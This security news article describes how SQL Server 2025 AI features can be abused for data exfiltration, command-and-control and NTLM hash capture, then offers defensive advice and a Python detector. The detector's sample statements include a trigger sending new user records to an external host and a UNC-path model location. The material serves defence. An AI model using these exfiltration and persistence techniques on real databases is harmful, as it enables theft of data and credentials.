Overview
Microsoft’s SQL Server 2025 was designed to bring AI into enterprise databases — but research from SpecterOps shows that these same features can be weaponized for data exfiltration and command‑and‑control (C2) operations. The findings reveal how legitimate AI functions can be repurposed by attackers to steal data and establish persistent backdoors without deploying traditional malware.

How Attackers Exploit SQL Server AI Features
At the core of the research is the stored procedure sp_invoke_external_rest_endpoint, which allows SQL Server to send HTTPS requests to external endpoints directly from the database engine. Originally intended for API integration, this feature can be abused to exfiltrate sensitive data over encrypted channels.

| Feature | Legitimate Purpose | Abuse Scenario |
|---|---|---|
| sp_invoke_external_rest_endpoint | Enables secure API calls from SQL Server | Sends data to attacker‑controlled servers via HTTPS |
| CREATE EXTERNAL MODEL | Integrates AI models for RAG workloads | Establishes covert C2 channels through AI embeddings |
| AI_GENERATE_EMBEDDINGS | Generates structured AI responses | Encodes commands and responses within AI traffic |

Because the traffic originates from the database engine and uses HTTPS, it can bypass traditional security tools that monitor for PowerShell or xp_cmdshell execution.

Real‑World Attack Scenarios
SpecterOps demonstrated how a compromised SQL Server instance with sysadmin privileges can query sensitive tables, convert data to JSON, and transmit it to an external server using the REST endpoint procedure.
Attackers can also use AI model calls to create persistent C2 channels:
- Encode commands within AI embedding data to make traffic appear legitimate.
- Periodically check in with external models to receive instructions and return results.
- Load malicious .NET CLR assemblies directly into memory to avoid disk‑based payloads.
In advanced cases, attackers can abuse UNC paths in AI model configurations to trigger NTLM authentication attempts over SMB, capturing or relaying hashes within the network. Microsoft did not classify this behavior as a vulnerability, leaving it exploitable in current deployments.

Persistence and Continuous Data Leakage
Attackers can create database triggers that automatically exfiltrate newly inserted or updated records. For example, any new user credentials added to a table can be instantly sent to an external server — turning the database into a continuous data leakage point.
This approach blurs the line between legitimate AI workloads and malicious activity, making traditional detection methods ineffective.

Defensive Recommendations
SpecterOps and security analysts recommend a multi‑layered defense strategy:
- Restrict Outbound Connections → Block database servers from initiating external HTTPS requests.
- Limit Sysadmin Privileges → Enforce least‑privilege access and audit privileged accounts.
- Monitor AI Integrations → Track usage of external REST endpoints and AI model calls.
- Baseline AI Traffic → Establish normal patterns to detect anomalies in AI workloads.
- Review CLR Assemblies → Identify unauthorized in‑memory modules or assemblies.
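
One way to act on the "Monitor AI Integrations" and "Review CLR Assemblies" items is to triage T-SQL statement text, as in the added example below (not SpecterOps' or Microsoft's code). It assumes statement text has already been exported from your audit source; the allowlisted host, the finding codes and the sample statements are constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this database is approved to call; replace with your own list.
ALLOWED_HOSTS = {"approved-ai.example.internal"}

URL_RE = re.compile(r"@url\s*=\s*N?'([^']+)'", re.I)
LOCATION_RE = re.compile(r"\bLOCATION\s*=\s*N?'([^']+)'", re.I)

def has(pattern, sql):
    return re.search(pattern, sql, re.I) is not None

def unapproved(url):
    """True when a URL points at a host outside the allowlist."""
    return (urlparse(url).hostname or "").lower() not in ALLOWED_HOSTS

def review_statement(sql):
    """Return sorted finding codes for one audited T-SQL statement."""
    findings = set()
    if has(r"\bsp_invoke_external_rest_endpoint\b", sql):
        in_trigger = has(r"\bCREATE\s+(OR\s+ALTER\s+)?TRIGGER\b", sql)
        findings.add("REST_IN_TRIGGER" if in_trigger else "REST_CALL")
        if any(unapproved(u) for u in URL_RE.findall(sql)):
            findings.add("UNAPPROVED_HOST")
    if has(r"\bCREATE\s+EXTERNAL\s+MODEL\b", sql):
        findings.add("EXTERNAL_MODEL")
        for loc in LOCATION_RE.findall(sql):
            if loc.startswith("\\\\"):  # UNC path: triggers SMB/NTLM authentication
                findings.add("UNC_LOCATION")
            elif loc.lower().startswith("http") and unapproved(loc):
                findings.add("UNAPPROVED_HOST")
    if has(r"\bAI_GENERATE_EMBEDDINGS\b", sql):
        findings.add("EMBEDDING_CALL")
    if has(r"\bCREATE\s+ASSEMBLY\b[\s\S]*\bFROM\s+0x", sql):  # assembly from inline bytes
        findings.add("CLR_FROM_BYTES")
    return sorted(findings)

# Constructed, abbreviated statements standing in for exported audit records.
SAMPLES = [
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://approved-ai.example.internal/v1/embeddings', @payload = @p;",
    "CREATE TRIGGER trg_users ON dbo.Users AFTER INSERT AS EXEC sp_invoke_external_rest_endpoint @url = N'https://collector.example.net/in', @payload = @j;",
    r"CREATE EXTERNAL MODEL m1 WITH (LOCATION = '\\fileserver.example.net\share\model');",
    "CREATE ASSEMBLY util FROM 0x4D5A WITH PERMISSION_SET = UNSAFE;",
    "SELECT AI_GENERATE_EMBEDDINGS(Description USE MODEL m1) FROM dbo.Products;",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(review_statement(s), "<-", s[:60])
```

A REST call inside a trigger and a model location given as a UNC path are reported separately from ordinary calls because they correspond to the persistence and NTLM scenarios described above; dynamically built URLs are not resolved by this check and still need manual review.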

Expert in the Cloud Insight
SQL Server 2025 illustrates a new security paradox: innovation without corresponding controls expands the attack surface. As AI becomes embedded in enterprise software, defenders must adapt to a world where the database itself can communicate externally and execute AI‑driven logic.
For security leaders, the lesson is clear — treat AI features as networked components, not isolated functions. Apply the same rigor used for API security to AI integrations and monitor them as potential exfiltration channels.